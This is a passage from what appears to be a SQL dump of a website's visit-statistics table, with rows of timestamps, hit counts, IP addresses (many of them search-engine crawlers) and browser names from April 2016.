1,0,0,'91.196.178.40','firefox'),(35029,1460108337,2,2,0,0,'91.196.178.66','firefox'),(35030,1460108797,1,1,0,0,'91.196.178.101','chrome'),(35031,1460109353,1,1,0,0,'91.196.178.71','firefox'),(35032,1460110690,1,1,0,0,'91.196.178.67','firefox'),(35033,1460111206,1,1,0,0,'199.30.228.135','firefox'),(35034,1460113615,1,1,0,0,'207.46.13.129','other'),(35035,1460114521,1,1,0,0,'91.196.178.67','firefox'),(35036,1460114703,1,1,0,0,'37.53.228.217','firefox'),(35037,1460115964,2,2,0,0,'91.196.178.66','firefox'),(35038,1460116221,1,1,0,0,'91.196.178.67','firefox'),(35039,1460117312,2,2,0,0,'91.196.178.67','firefox'),(35040,1460118378,2,2,0,0,'91.196.178.67','firefox'),(35041,1460119812,3,3,0,0,'91.196.178.67','firefox'),(35042,1460125196,1,1,0,0,'94.179.247.188','firefox'),(35043,1460126551,1,0,1,0,'66.249.66.82',''),(35044,1460126772,2,2,0,0,'94.179.247.188','firefox'),(35045,1460126904,2,0,2,0,'66.249.78.171',''),(35046,1460126908,11,0,11,0,'66.249.78.164',''),(35047,1460127034,3,0,3,0,'66.249.66.76',''),(35048,1460127300,1,0,1,0,'66.249.78.178',''),(35049,1460127811,1,0,1,0,'66.249.78.164',''),(35050,1460129887,1,1,0,0,'94.179.247.188','firefox'),(35051,1460134429,3,3,0,0,'94.179.247.188','firefox'),(35052,1460136686,1,1,0,0,'94.179.247.188','firefox'),(35053,1460140025,1,1,0,0,'37.73.235.197','chrome'),(35054,1460142284,1,1,0,0,'37.73.235.197','chrome'),(35055,1460143487,2,2,0,0,'91.196.178.103','chrome'),(35056,1460144023,2,2,0,0,'94.179.55.60','firefox'),(35057,1460173815,1,1,0,0,'141.0.14.130','other'),(35058,1460173837,1,1,0,0,'141.0.14.130','chrome'),(35059,1460173838,1,1,0,0,'141.0.14.130','opera'),(35060,1460176125,1,1,0,0,'91.196.178.132','chrome'),(35061,1460179940,1,1,0,0,'94.179.247.188','firefox'),(35062,1460181018,1,1,0,0,'94.179.247.188','firefox'),(35063,1460182409,15,0,15,0,'66.249.66.54',''),(35064,1460182418,2,0,2,0,'66.249.78.143',''),(35065,1460182423,34,0,34,0,'66.249.78.136',''),(35066,1460182913,1,1,0,0,'94.179.247.188','firefox'),(35067,1460183882,1,1,0,0,'66.249.78.150','other'),(35068,1460183955,1,1,0,0,'94.179.247.188','firefox'),(35069,1460184147,2,0,2,0,'66.249.78.136',''),(35070,1460184317,2,1,1,0,'66.249.78.136',''),(35071,1460184793,2,2,0,0,'66.249.78.136','other'),(35072,1460184967,1,1,0,0,'94.179.247.188','firefox'),(35073,1460184998,1,1,0,0,'157.55.39.172','other'),(35074,1460185681,1,1,0,0,'66.249.66.60','other'),(35075,1460186278,1,1,0,0,'94.179.247.188','firefox'),(35076,1460188686,1,1,0,0,'94.179.25.106','chrome'),(35077,1460191995,1,1,0,0,'91.196.178.133','other'),(35078,1460192127,1,0,1,0,'66.249.78.150',''),(35079,1460192713,16,16,0,0,'157.55.39.172','other'),(35080,1460193204,10,10,0,0,'157.55.39.64','other'),(35081,1460193503,14,14,0,0,'207.46.13.161','other'),(35082,1460193533,8,8,0,0,'157.55.39.245','other'),(35083,1460199816,2,2,0,0,'157.55.39.245','other'),(35084,1460200336,1,1,0,0,'157.55.39.172','other'),(35085,1460200436,2,2,0,0,'157.55.39.64','other'),(35086,1460201274,2,2,0,0,'207.46.13.161','other'),(35087,1460201552,5,5,0,0,'157.55.39.172','other'),(35088,1460201804,5,5,0,0,'157.55.39.64','other'),(35089,1460201924,1,0,1,0,'66.249.64.108',''),(35090,1460202231,5,5,0,0,'207.46.13.161','other'),(35091,1460202585,3,3,0,0,'157.55.39.245','other'),(35092,1460202598,1,1,0,0,'157.55.39.172','other'),(35093,1460202718,1,1,0,0,'157.55.39.64','other'),(35094,1460203522,2,2,0,0,'207.46.13.161','other'),(35095,1460203823,1,1,0,0,'157.55.39.64','other'),(35096,1460203828,2,2,0,0,'157.55.39.245','other'),(35097,1460204909,2,2,0,0,'207.46.13.161','other'),(35098,1460205257,1,1,0,0,'157.55.39.245','other'),(35099,1460205742,3,3,0,0,'157.55.39.172','other'),(35100,1460205983,3,3,0,0,'157.55.39.64','other'),(35101,1460206366,1,1,0,0,'157.55.39.245','other'),(35102,1460207520,1,1,0,0,'157.55.39.245','other'),(35103,1460207945,3,3,0,0,'157.55.39.64','other'),(35104,1460208432,4,4,0,0,'157.55.39.245','other'),(35105,1460208436,6,6,0,0,'157.55.39.172','other'),(35106,1460208441,5,5,0,0,'207.46.13.161','other'),(35107,1460208910,1,1,0,0,'157.55.39.64','other'),(35108,1460209564,1,1,0,0,'157.55.39.172','other'),(35109,1460211637,1,1,0,0,'157.55.39.245','other'),(35110,1460211865,1,1,0,0,'157.55.39.172','other'),(35111,1460212193,4,4,0,0,'157.55.39.64','other'),(35112,1460212812,4,4,0,0,'157.55.39.172','other'),(35113,1460212817,5,5,0,0,'207.46.13.161','other'),(35114,1460212843,5,5,0,0,'157.55.39.245','other'),(35115,1460213985,1,1,0,0,'157.55.39.245','other'),(35116,1460214060,3,3,0,0,'157.55.39.64','other'),(35117,1460214344,3,3,0,0,'207.46.13.110','other'),(35118,1460214348,2,2,0,0,'157.55.39.172','other'),(35119,1460214360,1,1,0,0,'207.46.13.161','other'),(35120,1460215226,1,1,0,0,'157.55.39.64','other'),(35121,1460215456,5,5,0,0,'207.46.13.161','other'),(35122,1460215519,2,2,0,0,'207.46.13.110','other'),(35123,1460215523,7,7,0,0,'157.55.39.172','other'),(35124,1460216131,3,3,0,0,'157.55.39.64','other'),(35125,1460216713,2,2,0,0,'207.46.13.110','other'),(35126,1460216718,6,6,0,0,'207.46.13.161','other'),(35127,1460216728,4,4,0,0,'157.55.39.172','other'),(35128,1460217827,3,3,0,0,'207.46.13.110','other'),(35129,1460217870,2,2,0,0,'157.55.39.172','other'),(35130,1460217895,2,2,0,0,'157.55.39.64','other'),(35131,1460218421,3,3,0,0,'207.46.13.161','other'),(35132,1460218581,1,1,0,0,'91.196.178.40','firefox'),(35133,1460218612,1,1,0,0,'66.249.93.147','chrome'),(35134,1460218823,9,9,0,0,'157.55.39.172','other'),(35135,1460219078,9,9,0,0,'207.46.13.110','other'),(35136,1460219265,1,1,0,0,'94.179.247.188','firefox'),(35137,1460219409,4,4,0,0,'207.46.13.161','other'),(35138,1460219752,5,5,0,0,'157.55.39.64','other'),(35139,1460219766,1,1,0,0,'157.55.39.172','other'),(35140,1460220345,1,1,0,0,'207.46.13.161','other'),(35141,1460221888,1,1,0,0,'94.179.247.188','firefox'),(35142,1460222460,1,1,0,0,'207.46.13.110','other'),(35143,1460224161,1,1,0,0,'157.55.39.172','other'),(35144,1460224463,3,3,0,0,'207.46.13.161','other'),(35145,1460224468,3,3,0,0,'207.46.13.110','other'),(35146,1460225243,2,2,0,0,'94.179.247.188','firefox'),(35147,1460227182,1,1,0,0,'207.46.13.120','other'),(35148,1460227186,3,3,0,0,'207.46.13.161','other'),(35149,1460227943,1,1,0,0,'94.179.247.188','firefox'),(35150,1460228668,1,1,0,0,'157.55.39.172','other'),(35151,1460228968,2,2,0,0,'157.55.39.64','other'),(35152,1460228972,1,1,0,0,'207.46.13.161','other'),(35153,1460228979,2,2,0,0,'207.46.13.120','other'),(35154,1460229431,1,1,0,0,'94.179.40.196','chrome'),(35155,1460230011,1,1,0,0,'157.55.39.172','other'),(35156,1460230658,2,2,0,0,'157.55.39.64','other'),(35157,1460230959,2,2,0,0,'157.55.39.172','other'),(35158,1460230963,1,1,0,0,'207.46.13.161','other'),(35159,1460230974,2,2,0,0,'207.46.13.120','other'),(35160,1460232915,1,1,0,0,'94.179.247.188','other'),(35161,1460237580,1,1,0,0,'157.55.39.64','other'),(35162,1460237583,3,3,0,0,'207.46.13.120','other'),(35163,1460237589,1,1,0,0,'157.55.39.172','other'),(35164,1460237887,2,2,0,0,'207.46.13.161','other'),(35165,1460243846,1,0,1,0,'66.249.64.239',''),(35166,1460257242,1,0,1,0,'66.249.64.170',''),(35167,1460259532,1,1,0,0,'94.179.247.188','other'),(35168,1460263445,25,0,25,0,'66.249.64.108',''),(35169,1460263622,2,0,2,0,'66.249.64.244',''),(35170,1460263669,10,0,10,0,'66.249.64.239',''),(35171,1460264364,33,0,33,0,'66.249.64.108',''),(35172,1460264583,4,0,4,0,'66.249.64.239',''),(35173,1460265296,16,0,16,0,'66.249.64.108',''),(35174,1460265524,23,0,23,0,'66.249.64.239',''),(35175,1460266021,1,1,0,0,'157.55.39.172','other'),(35176,1460266276,2,0,2,0,'66.249.64.108',''),(35177,1460266457,28,0,28,0,'66.249.64.239',''),(35178,1460267306,1,0,1,0,'66.249.64.118',''),(35179,1460267359,12,0,12,0,'66.249.64.239',''),(35180,1460267405,4,0,4,0,'66.249.64.108',''),(35181,1460267798,6,0,6,0,'66.249.64.113',''),(35182,1460268307,4,0,4,0,'66.249.64.239',''),(35183,1460268509,7,0,7,0,'66.249.64.108',''),(35184,1460269217,8,0,8,0,'66.249.64.239',''),(35185,1460269491,1,0,1,0,'66.249.64.108',''),(35186,1460269690,1,1,0,0,'94.179.247.188','firefox'),(35187,1460270144,2,0,2,0,'66.249.64.239',''),(35188,1460272216,1,0,1,0,'66.249.64.113',''),(35189,1460273121,1,0,1,0,'66.249.64.113',''),(35190,1460274511,2,0,2,0,'66.249.64.118',''),(35191,1460274655,1,0,1,0,'66.249.64.108',''),(35192,1460274916,2,0,2,0,'66.249.64.113',''),(35193,1460275099,1,0,1,0,'66.249.64.249',''),(35194,1460275627,1,0,1,0,'66.249.64.239',''),(35195,1460275971,1,0,1,0,'66.249.64.118',''),(35196,1460276322,2,0,2,0,'66.249.64.244',''),(35197,1460277143,1,0,1,0,'66.249.64.108',''),(35198,1460277519,2,0,2,0,'66.249.64.239',''),(35199,1460279169,1,1,0,0,'91.196.178.40','firefox'),(35200,1460279501,2,0,2,0,'66.249.64.244',''),(35201,1460280303,2,0,2,0,'66.249.64.118',''),(35202,1460280685,7,0,7,0,'66.249.64.108',''),(35203,1460280718,1,0,1,0,'66.249.64.239',''),(35204,1460280862,1,0,1,0,'66.249.64.113',''),(35205,1460281058,1,0,1,0,'66.249.64.249',''),(35206,1460281688,1,0,1,0,'66.249.64.239',''),(35207,1460281826,4,0,4,0,'66.249.64.108',''),(35208,1460282223,1,0,1,0,'66.249.64.249',''),(35209,1460282761,2,0,2,0,'66.249.64.108',''),(35210,1460283300,2,0,2,0,'66.249.64.239',''),(35211,1460283786,1,0,1,0,'66.249.64.118',''),(35212,1460284603,2,0,2,0,'66.249.64.249',''),(35213,1460284908,1,0,1,0,'66.249.64.244',''),(35214,1460286032,1,0,1,0,'66.249.64.239',''),(35215,1460286427,2,0,2,0,'66.249.64.249',''),(35216,1460287439,1,0,1,0,'66.249.64.244',''),(35217,1460287643,1,0,1,0,'66.249.64.108',''),(35218,1460287916,1,1,0,0,'94.179.247.188','chrome'),(35219,1460287929,1,0,1,0,'66.249.64.249',''),(35220,1460288345,2,0,2,0,'66.249.64.239',''),(35221,1460288585,2,0,2,0,'66.249.64.244',''),(35222,1460289158,1,0,1,0,'66.249.64.108',''),(35223,1460290560,1,0,1,0,'66.249.64.118',''),(35224,1460290695,2,0,2,0,'66.249.64.113',''),(35225,1460291458,10,0,10,0,'66.249.64.108',''),(35226,1460291580,1,0,1,0,'66.249.64.118',''),(35227,1460291654,1,0,1,0,'66.249.64.113',''),(35228,1460292485,1,0,1,0,'66.249.64.108',''),(35229,1460292877,2,0,2,0,'66.249.64.249',''),(35230,1460294031,1,0,1,0,'66.249.64.108',''),(35231,1460294561,2,0,2,0,'66.249.64.239',''),(35232,1460295743,1,1,0,0,'66.249.64.108','other'),(35233,1460295912,1,0,1,0,'66.249.64.244',''),(35234,1460296475,1,1,0,0,'178.95.158.89','chrome'),(35235,1460297456,1,1,0,0,'178.95.158.89','chrome'),(35236,1460297516,1,0,1,0,'66.249.64.239',''),(35237,1460298481,2,0,2,0,'66.249.64.113',''),(35238,1460298566,2,0,2,0,'66.249.64.118',''),(35239,1460299430,1,0,1,0,'66.249.64.108',''),(35240,1460300801,3,0,3,0,'66.249.64.118',''),(35241,1460302016,1,0,1,0,'66.249.64.113',''),(35242,1460302268,2,0,2,0,'66.249.64.249',''),(35243,1460302461,2,0,2,0,'66.249.64.239',''),(35244,1460302534,1,0,1,0,'66.249.64.108',''),(35245,1460302607,2,0,2,0,'66.249.64.244',''),(35246,1460303676,3,0,3,0,'66.249.64.108',''),(35247,1460303800,1,0,1,0,'66.249.64.244',''),(35248,1460304283,2,0,2,0,'66.249.64.239',''),(35249,1460304465,1,0,1,0,'66.249.64.249',''),(35250,1460305183,1,0,1,0,'66.249.64.108',''),(35251,1460306885,1,0,1,0,'66.249.64.244',''),(35252,1460307454,2,0,2,0,'66.249.64.249',''),(35253,1460308502,1,0,1,0,'66.249.64.239',''),(35254,1460308780,1,0,1,0,'66.249.64.118',''),(35255,1460309569,1,0,1,0,'66.249.64.249',''),(35256,1460310159,1,1,0,0,'94.179.247.188','firefox'),(35257,1460311613,4,0,4,0,'66.249.64.244',''),(35258,1460311699,2,0,2,0,'66.249.64.249',''),(35259,1460311871,2,0,2,0,'66.249.64.239',''),(35260,1460312624,1,0,1,0,'66.249.64.244',''),(35261,1460313141,1,0,1,0,'66.249.64.249',''),(35262,1460313587,1,0,1,0,'66.249.64.239',''),(35263,1460315478,3,0,3,0,'66.249.64.239',''),(35264,1460315960,3,0,3,0,'66.249.64.244',''),(35265,1460316014,3,3,0,0,'78.160.195.145','other'),(35266,1460316072,1,0,1,0,'66.249.64.249',''),(35267,1460316588,2,0,2,0,'66.249.64.113',''),(35268,1460316713,4,0,4,0,'66.249.64.118',''),(35269,1460316891,1,0,1,0,'66.249.64.108',''),(35270,1460317491,3,0,3,0,'66.249.64.113',''),(35271,1460317498,1,0,1,0,'66.249.64.244',''),(35272,1460318631,2,0,2,0,'66.249.64.113',''),(35273,1460318917,2,0,2,0,'66.249.64.239',''),(35274,1460318961,1,1,0,0,'107.21.1.8','other'),(35275,1460318986,1,0,1,0,'66.249.64.108',''),(35276,1460319862,1,0,1,0,'66.249.64.244',''),(35277,1460319999,1,0,1,0,'66.249.64.239',''),(35278,1460321514,1,0,1,0,'66.249.64.239',''),(35279,1460321561,1,0,1,0,'66.249.64.249',''),(35280,1460321818,1,1,0,0,'157.55.39.42','other'),(35281,1460322047,2,2,0,0,'157.55.39.67','other'),(35282,1460322897,2,2,0,0,'40.77.167.59','other'),(35283,1460324375,1,1,0,0,'157.55.39.67','other'),(35284,1460324473,1,0,1,0,'66.249.64.113',''),(35285,1460324875,1,1,0,0,'157.55.39.42','other'),(35286,1460325848,1,1,0,0,'94.178.76.179','firefox'),(35287,1460326863,2,2,0,0,'157.55.39.42','other'),(35288,1460326865,1,0,1,0,'66.249.64.239',''),(35289,1460327913,2,2,0,0,'157.55.39.42','other'),(35290,1460327956,2,0,2,0,'66.249.64.113',''),(35291,1460328596,1,0,1,0,'66.249.64.118',''),(35292,1460329093,1,0,1,0,'66.249.64.244',''),(35293,1460329282,1,0,1,0,'66.249.64.113',''),(35294,1460329541,1,0,1,0,'66.249.64.118',''),(35295,1460330035,1,1,0,0,'207.46.13.28','other'),(35296,1460330304,1,1,0,0,'40.77.167.59','other'),(35297,1460330489,2,0,2,0,'66.249.64.108',''),(35298,1460332881,2,0,2,0,'66.249.64.244',''),(35299,1460333064,1,0,1,0,'66.249.64.113',''),(35300,1460333566,2,0,2,0,'66.249.64.239',''),(35301,1460333583,1,0,1,0,'66.249.64.118',''),(35302,1460333854,2,0,2,0,'66.249.64.108',''),(35303,1460334768,1,0,1,0,'66.249.64.113',''),(35304,1460336592,2,0,2,0,'66.249.64.113',''),(35305,1460337389,2,0,2,0,'66.249.64.108',''),(35306,1460337581,1,0,1,0,'66.249.64.113',''),(35307,1460337724,1,0,1,0,'66.249.64.249',''),(35308,1460338186,1,0,1,0,'66.249.64.244',''),(35309,1460338646,1,1,0,0,'66.249.64.239','other'),(35310,1460339004,2,0,2,0,'66.249.64.118',''),(35311,1460339722,1,0,1,0,'66.249.64.244',''),(35312,1460339802,1,1,0,0,'66.249.64.113','other'),(35313,1460340365,1,1,0,0,'66.249.64.239','other'),(35314,1460341484,1,0,1,0,'66.249.64.108',''),(35315,1460342794,1,0,1,0,'66.249.64.239',''),(35316,1460342845,1,0,1,0,'66.249.64.118',''),(35317,1460347296,1,0,1,0,'66.249.64.249',''),(35318,1460348086,1,0,1,0,'66.249.64.244',''),(35319,1460348226,1,0,1,0,'66.249.64.113',''),(35320,1460349694,2,0,2,0,'66.249.64.249',''),(35321,1460350181,2,0,2,0,'66.249.64.239',''),(35322,1460350900,1,0,1,0,'66.249.64.244',''),(35323,1460350970,1,1,0,0,'91.196.178.67','firefox'),(35324,1460352130,1,0,1,0,'66.249.64.244',''),(35325,1460352225,1,1,0,0,'91.196.178.67','firefox'),(35326,1460352294,2,0,2,0,'66.249.64.249',''),(35327,1460352584,2,2,0,0,'66.249.64.239','other'),(35328,1460353081,1,0,1,0,'66.249.64.244',''),(35329,1460353325,1,0,1,0,'66.249.78.171',''),(35330,1460353527,1,1,0,0,'66.249.93.153','chrome'),(35331,1460353719,1,0,1,0,'66.249.64.118',''),(35332,1460353842,2,0,2,0,'66.249.64.249',''),(35333,1460355154,1,1,0,0,'91.196.179.33','other'),(35334,1460355900,1,1,0,0,'213.108.45.138','chrome'),(35335,1460356376,1,0,1,0,'66.249.64.239',''),(35336,1460356449,1,1,0,0,'91.196.178.66','chrome'),(35337,1460356761,2,2,0,0,'91.196.178.67','firefox'),(35338,1460356798,1,0,1,0,'66.249.64.113',''),(35339,1460357365,1,1,0,0,'91.196.178.66','chrome'),(35340,1460357873,1,1,0,0,'91.196.178.67','firefox'),(35341,1460359465,2,2,0,0,'37.54.173.147','other'),(35342,1460359519,1,1,0,0,'91.196.178.67','firefox'),(35343,1460360934,1,0,1,0,'66.249.64.244',''),(35344,1460361256,1,1,0,0,'91.196.178.67','firefox'),(35345,1460362007,3,3,0,0,'66.249.64.249','other'),(35346,1460362891,1,0,1,0,'66.249.64.113',''),(35347,1460363086,2,0,2,0,'66.249.64.108',''),(35348,1460363361,1,1,0,0,'66.249.64.239','other'),(35349,1460364482,1,0,1,0,'66.249.64.108',''),(35350,1460364838,1,1,0,0,'91.196.178.67','firefox'),(35351,1460365608,1,0,1,0,'66.249.64.244',''),(35352,1460365833,2,2,0,0,'66.249.64.244','other'),(35353,1460366860,1,1,0,0,'94.179.29.71','msie'),(35354,1460368915,1,1,0,0,'91.196.178.67','firefox'),(35355,1460369106,2,2,0,0,'66.249.64.239','other'),(35356,1460369486,1,1,0,0,'66.249.64.244','other'),(35357,1460370051,1,1,0,0,'66.249.64.249','other'),(35358,1460370111,1,1,0,0,'94.179.29.71','msie'),(35359,1460371954,1,0,1,0,'66.249.64.244',''),(35360,1460373662,1,1,0,0,'66.249.64.108','other'),(35361,1460374696,1,0,1,0,'66.249.64.239',''),(35362,1460374723,1,1,0,0,'66.249.64.239','other'),(35363,1460376045,1,1,0,0,'66.249.64.239','other'),(35364,1460377137,1,1,0,0,'91.196.178.67','firefox'),(35365,1460377233,1,1,0,0,'91.196.178.40','firefox'),(35366,1460377901,1,0,1,0,'66.249.64.244',''),(35367,1460378050,2,2,0,0,'91.196.178.67','firefox'),(35368,1460378302,1,0,1,0,'66.249.64.118',''),(35369,1460378324,3,0,3,0,'66.249.64.113',''),(35370,1460378325,46,0,46,0,'66.249.64.108',''),(35371,1460379171,1,0,1,0,'66.249.64.239',''),(35372,1460379642,1,0,1,0,'66.249.64.249',''),(35373,1460379768,2,2,0,0,'91.196.178.67','firefox'),(35374,1460379784,2,0,2,0,'66.249.64.244',''),(35375,1460380244,2,2,0,0,'66.249.64.108','other'),(35376,1460380725,1,0,1,0,'66.249.64.249',''),(35377,1460380869,1,0,1,0,'66.249.64.239',''),(35378,1460380976,1,1,0,0,'91.196.178.67','firefox'),(35379,1460381243,1,0,1,0,'66.249.64.244',''),(35380,1460382134,1,1,0,0,'91.196.178.67','firefox'),(35381,1460382178,2,0,2,0,'66.249.64.108',''),(35382,1460382623,1,0,1,0,'66.249.64.249',''),(35383,1460382759,1,0,1,0,'66.249.64.118',''),(35384,1460382792,2,0,2,0,'66.249.64.113',''),(35385,1460382915,2,0,2,0,'66.249.64.239',''),(35386,1460383096,3,0,3,0,'66.249.64.108',''),(35387,1460385016,1,0,1,0,'66.249.64.239',''),(35388,1460387766,1,1,0,0,'94.179.247.188','firefox'),(35389,1460388207,1,0,1,0,'66.249.64.239',''),(35390,1460392752,1,0,1,0,'66.249.64.244',''),(35391,1460393011,1,1,0,0,'94.179.247.188','firefox'),(35392,1460394758,1,1,0,0,'94.179.247.188','firefox'),(35393,1460395386,1,0,1,0,'66.249.64.249',''),(35394,1460395823,1,0,1,0,'66.249.64.42',''),(35395,1460395988,1,1,0,0,'94.179.247.188','firefox'),(35396,1460404712,2,0,2,0,'66.249.64.249',''),(35397,1460405910,2,0,2,0,'66.249.64.239',''),(35398,1460406279,2,0,2,0,'66.249.64.244',''),(35399,1460406735,1,0,1,0,'66.249.64.108',''),(35400,1460406833,1,0,1,0,'66.249.64.249',''),(35401,1460406858,1,0,1,0,'66.249.64.239',''),(35402,1460407049,1,0,1,0,'66.249.64.118',''),(35403,1460409012,2,0,2,0,'66.249.64.118',''),(35404,1460409965,1,1,0,0,'130.185.155.10','msie'),(35405,1460410464,2,0,2,0,'66.249.64.249',''),(35406,1460410664,1,0,1,0,'66.249.64.113',''),(35407,1460411270,1,0,1,0,'66.249.64.118',''),(35408,1460411854,1,0,1,0,'66.249.64.113',''),(35409,1460412043,1,1,0,0,'66.249.64.244','other'),(35410,1460412485,1,0,1,0,'66.249.64.118',''),(35411,1460412801,1,1,0,0,'66.249.64.118','other'),(35412,1460413047,2,2,0,0,'66.249.64.239','other'),(35413,1460413063,2,2,0,0,'66.249.64.108','other'),(35414,1460413528,2,2,0,0,'66.249.64.249','other'),(35415,1460414070,2,2,0,0,'66.249.64.244','other'),(35416,1460414234,1,1,0,0,'66.249.64.118','other'),(35417,1460414488,1,1,0,0,'66.249.64.108','other'),(35418,1460414681,1,1,0,0,'66.249.64.239','other'),(35419,1460414874,1,1,0,0,'66.249.64.249','other'),(35420,1460415005,2,2,0,0,'66.249.64.113','other'),(35421,1460415809,1,1,0,0,'66.249.64.108','other'),(35422,1460416823,1,1,0,0,'66.249.64.118','other'),(35423,1460417110,1,1,0,0,'66.249.64.239','other'),(35424,1460418279,2,0,2,0,'66.249.64.239',''),(35425,1460419549,1,0,1,0,'66.249.64.244',''),(35426,1460420329,2,0,2,0,'66.249.64.239',''),(35427,1460420336,1,0,1,0,'66.249.64.113',''),(35428,1460420493,1,0,1,0,'66.249.64.118',''),(35429,1460425973,1,1,0,0,'66.249.64.244','other'),(35430,1460426460,1,1,0,0,'66.249.64.249','other'),(35431,1460429722,1,1,0,0,'94.179.247.188','other'),(35432,1460429906,1,0,1,0,'66.249.64.239',''),(35433,1460430829,1,1,0,0,'94.179.247.188','firefox'),(35434,1460432205,2,0,2,0,'66.249.64.239',''),(35435,1460433442,1,0,1,0,'66.249.64.47',''),(35436,1460434220,1,0,1,0,'66.249.64.244',''),(35437,1460434444,1,0,1,0,'66.249.64.249',''),(35438,1460437826,1,1,0,0,'91.196.178.67','firefox'),(35439,1460438236,1,0,1,0,'66.249.64.108',''),(35440,1460440049,1,1,0,0,'91.196.178.130','chrome'),(35441,1460440824,1,0,1,0,'66.249.64.108',''),(35442,1460441254,1,0,1,0,'66.249.64.239',''),(35443,1460441328,1,1,0,0,'91.196.178.70','chrome'),(35444,1460442410,1,1,0,0,'91.196.178.67','firefox'),(35445,1460442814,1,1,0,0,'66.249.93.147','chrome'),(35446,1460443015,1,1,0,0,'91.196.177.8','chrome'),(35447,1460443037,3,0,3,0,'66.249.64.249',''),(35448,1460443040,1,0,1,0,'66.249.64.244',''),(35449,1460444464,1,1,0,0,'91.196.178.67','chrome'),(35450,1460445941,1,0,1,0,'66.249.64.249',''),(35451,1460446008,1,0,1,0,'66.249.64.244',''),(35452,1460446049,1,0,1,0,'66.249.64.118',''),(35453,1460447619,1,1,0,0,'91.196.178.67','firefox'),(35454,1460448142,1,0,1,0,'66.249.64.249',''),(35455,1460450863,3,3,0,0,'91.196.178.67','firefox'),(35456,1460453669,1,1,0,0,'91.196.178.67','firefox'),(35457,1460453976,1,1,0,0,'207.46.13.140','other'),(35458,1460454761,1,1,0,0,'157.55.39.179','other'),(35459,1460455039,1,1,0,0,'91.196.178.165','opera'),(35460,1460455066,1,1,0,0,'207.46.13.140','other'),(35461,1460455211,1,1,0,0,'93.73.234.193','chrome'),(35462,1460455360,1,1,0,0,'93.73.234.193','msie'),(35463,1460455362,1,1,0,0,'93.73.234.193','firefox'),(35464,1460455948,1,0,1,0,'66.249.64.239',''),(35465,1460456086,1,0,1,0,'66.249.64.244',''),(35466,1460457182,1,0,1,0,'66.249.64.244',''),(35467,1460459401,1,0,1,0,'66.249.64.249',''),(35468,1460459691,2,0,2,0,'66.249.64.239',''),(35469,1460459706,1,0,1,0,'66.249.64.244',''),(35470,1460460504,1,0,1,0,'66.249.64.113',''),(35471,1460460513,1,0,1,0,'66.249.64.108',''),(35472,1460460639,1,0,1,0,'66.249.64.244',''),(35473,1460461546,1,0,1,0,'66.249.64.244',''),(35474,1460461883,2,2,0,0,'157.55.39.67','other'),(35475,1460462211,1,1,0,0,'207.46.13.140','other'),(35476,1460462506,2,2,0,0,'40.77.167.59','other'),(35477,1460462532,1,0,1,0,'66.249.64.239',''),(35478,1460462710,1,1,0,0,'91.196.178.67','firefox'),(35479,1460462981,2,2,0,0,'157.55.39.179','other'),(35480,1460463351,2,2,0,0,'207.46.13.140','other'),(35481,1460463674,1,1,0,0,'40.77.167.59','other'),(35482,1460463888,2,2,0,0,'157.55.39.179','other'),(35483,1460464300,1,1,0,0,'157.55.39.67','other'),(35484,1460464737,1,1,0,0,'91.196.178.67','firefox'),(35485,1460465477,1,0,1,0,'66.249.69.244',''),(35486,1460465968,2,2,0,0,'207.46.13.140','other'),(35487,1460466003,1,1,0,0,'91.196.178.67','firefox'),(35488,1460466146,2,2,0,0,'40.77.167.59','other'),(35489,1460466275,2,2,0,0,'157.55.39.67','other'),(35490,1460466652,1,0,1,0,'66.249.75.81',''),(35491,1460466781,1,0,1,0,'66.249.69.244',''),(35492,1460467058,2,2,0,0,'40.77.167.59','other'),(35493,1460467821,1,1,0,0,'157.55.39.179','other'),(35494,1460468048,1,1,0,0,'207.46.13.140','other'),(35495,1460469182,1,1,0,0,'157.55.39.67','other'),(35496,1460469374,1,1,0,0,'207.46.13.140','other'),(35497,1460469587,1,1,0,0,'40.77.167.59','other'),(35498,1460470253,2,2,0,0,'157.55.39.67','other'),(35499,1460470657,2,2,0,0,'157.55.39.179','other'),(35500,1460470934,1,1,0,0,'207.46.13.140','other'),(35501,1460472095,2,2,0,0,'207.46.13.140','other'),(35502,1460472368,4,4,0,0,'157.55.39.179','other'),(35503,1460473069,1,1,0,0,'40.77.167.59','other'),(35504,1460473556,2,2,0,0,'207.46.13.140','other'),(35505,1460473569,1,0,1,0,'66.249.75.95',''),(35507,1460473888,2,2,0,0,'157.55.39.179','other'),(35508,1460474555,2,2,0,0,'157.55.39.67','other'),(35509,1460474612,1,1,0,0,'207.46.13.140','other'),(35510,1460475215,1,1,0,0,'157.55.39.179','other'),(35511,1460475344,1,1,0,0,'66.249.69.244','other'),(35512,1460475348,1,1,0,0,'40.77.167.59','other'),(35513,1460475729,1,1,0,0,'91.196.178.71','firefox'),(35514,1460475837,3,3,0,0,'207.46.13.140','other'),(35515,1460476259,1,1,0,0,'157.55.39.179','other'),(35516,1460477065,1,1,0,0,'207.46.13.140','other'),(35517,1460477280,1,1,0,0,'94.179.247.188','firefox'),(35518,1460477611,1,1,0,0,'157.55.39.179','other'),(35519,1460478027,1,0,1,0,'66.249.75.88',''),(35520,1460479422,1,1,0,0,'207.46.13.140','other'),(35521,1460479725,1,1,0,0,'157.55.39.179','other'),(35522,1460480135,1,0,1,0,'66.249.75.81',''),(35523,1460483675,2,0,2,0,'66.249.69.244',''),(35524,1460484404,1,1,0,0,'5.58.5.48','opera'),(35525,1460486459,2,2,0,0,'40.77.167.59','other'),(35526,1460486535,1,0,1,0,'66.249.69.239',''),(35527,1460486764,2,2,0,0,'157.55.39.67','other'),(35528,1460486770,1,1,0,0,'207.46.13.140','other'),(35529,1460486886,3,0,3,0,'66.249.75.88',''),(35530,1460491542,1,1,0,0,'40.77.167.59','other'),(35531,1460499291,1,1,0,0,'66.249.69.239','other'),(35532,1460500201,2,2,0,0,'66.249.69.239','other'),(35533,1460501254,2,2,0,0,'66.249.69.249','other'),(35534,1460501358,1,1,0,0,'66.249.75.95','other'),(35535,1460506238,2,0,2,0,'66.249.69.239',''),(35536,1460509388,1,0,1,0,'66.249.75.81',''),(35537,1460513455,1,0,1,0,'66.249.75.81',''),(35538,1460516036,1,1,0,0,'66.249.75.88','other'),(35539,1460520214,1,1,0,0,'66.249.75.81','other'),(35540,1460520734,1,0,1,0,'66.249.69.239',''),(35541,1460525819,1,1,0,0,'66.102.9.103','chrome'),(35542,1460526388,1,1,0,0,'91.196.178.67','firefox'),(35543,1460527350,1,0,1,0,'66.249.75.81',''),(35544,1460527365,1,0,1,0,'66.249.75.88',''),(35545,1460528332,1,1,0,0,'91.196.178.67','firefox'),(35546,1460529878,2,2,0,0,'91.196.178.67','firefox'),(35547,1460530731,1,1,0,0,'37.54.21.132','firefox'),(35548,1460532016,1,1,0